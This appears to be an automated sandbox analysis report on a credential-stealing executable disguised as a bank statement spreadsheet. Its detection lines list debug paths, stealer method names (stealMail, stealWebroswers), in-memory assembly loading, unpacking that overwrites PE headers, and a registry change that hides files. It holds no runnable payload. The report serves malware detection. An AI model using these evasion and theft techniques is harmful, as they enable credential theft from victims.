                Source: Binary string: C:\Users\Jovan\Documents\Visual Studio 2010\Projects\Stealer\CMemoryExecute\CMemoryExecute\obj\Release\CMemoryExecute.pdb source: BANK-STATMENT _xlsx.exe, BANK-STATMENT _xlsx.exe, 0000000E.00000002.788401031.0000000002642000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000000F.00000002.799181132.0000000002312000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000014.00000002.826494513.0000000002747000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000015.00000002.852456722.0000000000402000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001C.00000002.870010845.00000000027A2000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.884712791.0000000002AC1000.00000004.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000021.00000002.903399921.0000000002642000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000022.00000002.912614884.0000000002362000.00000004.00000001.sdmp
                Source: Binary string: C:\Windows\assembly\GA.pdbmscorlib\2.0.0.0__b77a5c561934e089\mscorlib.dll source: BANK-STATMENT _xlsx.exe, 00000001.00000002.777485300.0000000007D8A000.00000004.00000010.sdmp, BANK-STATMENT _xlsx.exe, 0000000F.00000002.808147157.00000000078AA000.00000004.00000010.sdmp, BANK-STATMENT _xlsx.exe, 00000015.00000002.862987604.00000000078AA000.00000004.00000010.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.889632651.00000000078AA000.00000004.00000010.sdmp, BANK-STATMENT _xlsx.exe, 00000022.00000002.919074712.00000000079EA000.00000004.00000010.sdmp
                Source: Binary string: indows\mscorlib.pdbpdblib.pdb source: BANK-STATMENT _xlsx.exe, 00000001.00000002.768432901.0000000002625000.00000004.00000040.sdmp, BANK-STATMENT _xlsx.exe, 0000000F.00000002.800371357.0000000002635000.00000004.00000040.sdmp, BANK-STATMENT _xlsx.exe, 00000015.00000002.853807140.0000000002445000.00000004.00000040.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.884255520.0000000002675000.00000004.00000040.sdmp
                Source: Binary string: \??\C:\Windows\mscorlib.pdb source: BANK-STATMENT _xlsx.exe, 00000001.00000002.774885507.0000000006775000.00000004.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000000F.00000002.806123008.00000000061FE000.00000004.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.882848976.00000000007BD000.00000004.00000020.sdmp
                Source: Binary string: f:\Projects\VS2005\mailpv\Release\mailpv.pdb source: BANK-STATMENT _xlsx.exe, vbc.exe, BANK-STATMENT _xlsx.exe, 0000000E.00000002.788401031.0000000002642000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000000F.00000002.803780001.0000000003A81000.00000004.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000014.00000002.826494513.0000000002747000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000015.00000002.852456722.0000000000402000.00000040.00000001.sdmp, vbc.exe, 00000019.00000002.833212497.0000000000400000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001C.00000002.870010845.00000000027A2000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.883042234.0000000000AD0000.00000004.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000021.00000002.903399921.0000000002642000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000022.00000002.912614884.0000000002362000.00000004.00000001.sdmp
                Source: Binary string: \??\C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdbsea source: BANK-STATMENT _xlsx.exe, 0000001D.00000002.882902656.000000000081C000.00000004.00000020.sdmp
                Source: Binary string: mscorlib.pdbH source: BANK-STATMENT _xlsx.exe, 00000001.00000002.777485300.0000000007D8A000.00000004.00000010.sdmp, BANK-STATMENT _xlsx.exe, 0000000F.00000002.808147157.00000000078AA000.00000004.00000010.sdmp, BANK-STATMENT _xlsx.exe, 00000015.00000002.862987604.00000000078AA000.00000004.00000010.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.889632651.00000000078AA000.00000004.00000010.sdmp, BANK-STATMENT _xlsx.exe, 00000022.00000002.919074712.00000000079EA000.00000004.00000010.sdmp
                Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: BANK-STATMENT _xlsx.exe, 00000001.00000002.768432901.0000000002625000.00000004.00000040.sdmp, BANK-STATMENT _xlsx.exe, 0000000F.00000002.800371357.0000000002635000.00000004.00000040.sdmp, BANK-STATMENT _xlsx.exe, 00000015.00000002.853807140.0000000002445000.00000004.00000040.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.884255520.0000000002675000.00000004.00000040.sdmp

                Data Obfuscation:

                barindex
                Detected unpacking (changes PE section rights)Show sources
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeUnpacked PE file: 1.2.BANK-STATMENT _xlsx.exe.400000.0.unpack CODE:ER;DATA:W;BSS:W;.idata:W;.tls:W;.rdata:R;.reloc:R;.rsrc:R; vs .text:ER;.rsrc:R;.reloc:R;
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeUnpacked PE file: 15.2.BANK-STATMENT _xlsx.exe.400000.0.unpack CODE:ER;DATA:W;BSS:W;.idata:W;.tls:W;.rdata:R;.reloc:R;.rsrc:R; vs .text:ER;.rsrc:R;.reloc:R;
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeUnpacked PE file: 21.2.BANK-STATMENT _xlsx.exe.400000.0.unpack CODE:ER;DATA:W;BSS:W;.idata:W;.tls:W;.rdata:R;.reloc:R;.rsrc:R; vs .text:ER;.rsrc:R;.reloc:R;
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeUnpacked PE file: 29.2.BANK-STATMENT _xlsx.exe.400000.0.unpack CODE:ER;DATA:W;BSS:W;.idata:W;.tls:W;.rdata:R;.reloc:R;.rsrc:R; vs .text:ER;.rsrc:R;.reloc:R;
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeUnpacked PE file: 34.2.BANK-STATMENT _xlsx.exe.400000.0.unpack CODE:ER;DATA:W;BSS:W;.idata:W;.tls:W;.rdata:R;.reloc:R;.rsrc:R; vs .text:ER;.rsrc:R;.reloc:R;
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeUnpacked PE file: 38.2.BANK-STATMENT _xlsx.exe.400000.0.unpack CODE:ER;DATA:W;BSS:W;.idata:W;.tls:W;.rdata:R;.reloc:R;.rsrc:R; vs .text:ER;.rsrc:R;.reloc:R;
                Detected unpacking (creates a PE file in dynamic memory)Show sources
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeUnpacked PE file: 15.2.BANK-STATMENT _xlsx.exe.2310000.3.unpack
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeUnpacked PE file: 29.2.BANK-STATMENT _xlsx.exe.2460000.3.unpack
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeUnpacked PE file: 34.2.BANK-STATMENT _xlsx.exe.2400000.3.unpack
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeUnpacked PE file: 38.2.BANK-STATMENT _xlsx.exe.2350000.3.unpack
                Detected unpacking (overwrites its own PE header)Show sources
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeUnpacked PE file: 1.2.BANK-STATMENT _xlsx.exe.400000.0.unpack
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeUnpacked PE file: 15.2.BANK-STATMENT _xlsx.exe.400000.0.unpack
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeUnpacked PE file: 21.2.BANK-STATMENT _xlsx.exe.400000.0.unpack
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeUnpacked PE file: 29.2.BANK-STATMENT _xlsx.exe.400000.0.unpack
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeUnpacked PE file: 34.2.BANK-STATMENT _xlsx.exe.400000.0.unpack
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeUnpacked PE file: 38.2.BANK-STATMENT _xlsx.exe.400000.0.unpack
                .NET source code contains potential unpackerShow sources
                Source: 0.2.BANK-STATMENT _xlsx.exe.2780000.3.unpack, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 0.2.BANK-STATMENT _xlsx.exe.2780000.3.unpack, Form1.cs.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 0.2.BANK-STATMENT _xlsx.exe.2780000.3.unpack, Form1.cs.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 0.2.BANK-STATMENT _xlsx.exe.2780000.3.unpack, Form1.cs.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 1.2.BANK-STATMENT _xlsx.exe.23b0000.3.unpack, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 1.2.BANK-STATMENT _xlsx.exe.23b0000.3.unpack, Form1.cs.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 1.2.BANK-STATMENT _xlsx.exe.23b0000.3.unpack, Form1.cs.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 1.2.BANK-STATMENT _xlsx.exe.23b0000.3.unpack, Form1.cs.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 1.2.BANK-STATMENT _xlsx.exe.2290000.2.unpack, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 1.2.BANK-STATMENT _xlsx.exe.2290000.2.unpack, Form1.cs.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 1.2.BANK-STATMENT _xlsx.exe.2290000.2.unpack, Form1.cs.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 1.2.BANK-STATMENT _xlsx.exe.2290000.2.unpack, Form1.cs.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 1.2.BANK-STATMENT _xlsx.exe.400000.0.unpack, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 1.2.BANK-STATMENT _xlsx.exe.400000.0.unpack, Form1.cs.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 1.2.BANK-STATMENT _xlsx.exe.400000.0.unpack, Form1.cs.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 1.2.BANK-STATMENT _xlsx.exe.400000.0.unpack, Form1.cs.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 14.2.BANK-STATMENT _xlsx.exe.2640000.3.unpack, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 14.2.BANK-STATMENT _xlsx.exe.2640000.3.unpack, Form1.cs.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 14.2.BANK-STATMENT _xlsx.exe.2640000.3.unpack, Form1.cs.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 14.2.BANK-STATMENT _xlsx.exe.2640000.3.unpack, Form1.cs.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 15.2.BANK-STATMENT _xlsx.exe.2310000.3.unpack, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 15.2.BANK-STATMENT _xlsx.exe.2310000.3.unpack, Form1.cs.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 15.2.BANK-STATMENT _xlsx.exe.2310000.3.unpack, Form1.cs.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 15.2.BANK-STATMENT _xlsx.exe.2310000.3.unpack, Form1.cs.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 15.2.BANK-STATMENT _xlsx.exe.2250000.2.unpack, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 15.2.BANK-STATMENT _xlsx.exe.2250000.2.unpack, Form1.cs.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 15.2.BANK-STATMENT _xlsx.exe.2250000.2.unpack, Form1.cs.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 15.2.BANK-STATMENT _xlsx.exe.2250000.2.unpack, Form1.cs.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 15.2.BANK-STATMENT _xlsx.exe.400000.0.unpack, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 15.2.BANK-STATMENT _xlsx.exe.400000.0.unpack, Form1.cs.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 15.2.BANK-STATMENT _xlsx.exe.400000.0.unpack, Form1.cs.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 15.2.BANK-STATMENT _xlsx.exe.400000.0.unpack, Form1.cs.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 20.2.BANK-STATMENT _xlsx.exe.26b0000.3.unpack, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 20.2.BANK-STATMENT _xlsx.exe.26b0000.3.unpack, Form1.cs.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 20.2.BANK-STATMENT _xlsx.exe.26b0000.3.unpack, Form1.cs.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 20.2.BANK-STATMENT _xlsx.exe.26b0000.3.unpack, Form1.cs.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 21.2.BANK-STATMENT _xlsx.exe.21e0000.2.unpack, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 21.2.BANK-STATMENT _xlsx.exe.21e0000.2.unpack, Form1.cs.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 21.2.BANK-STATMENT _xlsx.exe.21e0000.2.unpack, Form1.cs.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 21.2.BANK-STATMENT _xlsx.exe.21e0000.2.unpack, Form1.cs.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 21.2.BANK-STATMENT _xlsx.exe.400000.0.unpack, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 21.2.BANK-STATMENT _xlsx.exe.400000.0.unpack, Form1.cs.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 21.2.BANK-STATMENT _xlsx.exe.400000.0.unpack, Form1.cs.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 21.2.BANK-STATMENT _xlsx.exe.400000.0.unpack, Form1.cs.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 21.2.BANK-STATMENT _xlsx.exe.22c0000.3.unpack, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 21.2.BANK-STATMENT _xlsx.exe.22c0000.3.unpack, Form1.cs.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 21.2.BANK-STATMENT _xlsx.exe.22c0000.3.unpack, Form1.cs.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 21.2.BANK-STATMENT _xlsx.exe.22c0000.3.unpack, Form1.cs.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 0_2_004405C4 SetErrorMode,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,SetErrorMode,0_2_004405C4
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 0_2_00440BF4 push 00440C81h; ret 0_2_00440C79
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 0_2_00426050 push 0042607Ch; ret 0_2_00426074
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 0_2_0041A058 push ecx; mov dword ptr [esp], edx0_2_0041A05A
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 0_2_004100E4 push 00410145h; ret 0_2_0041013D
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 0_2_0042C0F4 push 0042C120h; ret 0_2_0042C118
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 0_2_0042C084 push 0042C0B0h; ret 0_2_0042C0A8
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 0_2_0040C0AE push 0040C0DCh; ret 0_2_0040C0D4
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 0_2_0040C0B0 push 0040C0DCh; ret 0_2_0040C0D4
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 0_2_0042C0BC push 0042C0E8h; ret 0_2_0042C0E0
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 0_2_00410148 push 00410349h; ret 0_2_00410341
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 0_2_0042614C push 00426178h; ret 0_2_00426170
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 0_2_0042C164 push 0042C190h; ret 0_2_0042C188
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 0_2_00442120 push 0044214Ch; ret 0_2_00442144
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 0_2_0042C12C push 0042C158h; ret 0_2_0042C150
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 0_2_004301C4 push 0043022Eh; ret 0_2_00430226
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 0_2_0042C1D4 push 0042C200h; ret 0_2_0042C1F8
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 0_2_004661E4 push ecx; mov dword ptr [esp], ecx0_2_004661E9
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 0_2_0042C19C push 0042C1C8h; ret 0_2_0042C1C0
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 0_2_00430230 push 0043029Ah; ret 0_2_00430292
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 0_2_00464314 push 00464340h; ret 0_2_00464338
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 0_2_00410458 push 00410488h; ret 0_2_00410480
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 0_2_0041045C push 00410488h; ret 0_2_00410480
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 0_2_00406576 push 004065C9h; ret 0_2_004065C1
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 0_2_00406578 push 004065C9h; ret 0_2_004065C1
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 0_2_0042E6E8 push 0042E714h; ret 0_2_0042E70C
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 0_2_0046A6F4 push 0046A720h; ret 0_2_0046A718
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 0_2_004166FC push ecx; mov dword ptr [esp], edx0_2_004166FE
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 0_2_004366B4 push ecx; mov dword ptr [esp], ecx0_2_004366B8
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 0_2_004606BC push 004606E8h; ret 0_2_004606E0
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 0_2_00406748 push 00406774h; ret 0_2_0040676C
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 0_2_0042E73C push 0042E768h; ret 0_2_0042E760

                Hooking and other Techniques for Hiding and Protection:

                barindex
                Changes the view of files in windows explorer (hidden files and folders)Show sources
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeKey value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced HiddenJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 0_2_004548A0 PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,0_2_004548A0
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 0_2_0043C024 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,0_2_0043C024
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 0_2_00426384 IsIconic,GetWindowPlacement,GetWindowRect,0_2_00426384
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 0_2_0043AE98 IsIconic,GetCapture,0_2_0043AE98
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 0_2_00454F94 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,0_2_00454F94
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 0_2_00455044 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,0_2_00455044
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 0_2_0043B740 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,0_2_0043B740
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 0_2_00451994 SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,0_2_00451994
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 2_2_004548A0 PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,2_2_004548A0
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 2_2_0043C024 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,2_2_0043C024
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 2_2_00426384 IsIconic,GetWindowPlacement,GetWindowRect,2_2_00426384
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 2_2_0043AE98 IsIconic,GetCapture,2_2_0043AE98
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 2_2_00454F94 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,2_2_00454F94
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 2_2_00455044 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,2_2_00455044
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 2_2_0043B740 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,2_2_0043B740
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 2_2_00451994 SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,2_2_00451994
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 0_2_004405C4 SetErrorMode,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,SetErrorMode,0_2_004405C4
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeKey value created or modified: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Immersive\production\Token\{67082621-8D18-4333-9C64-10DE93676363} DeviceTicketJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
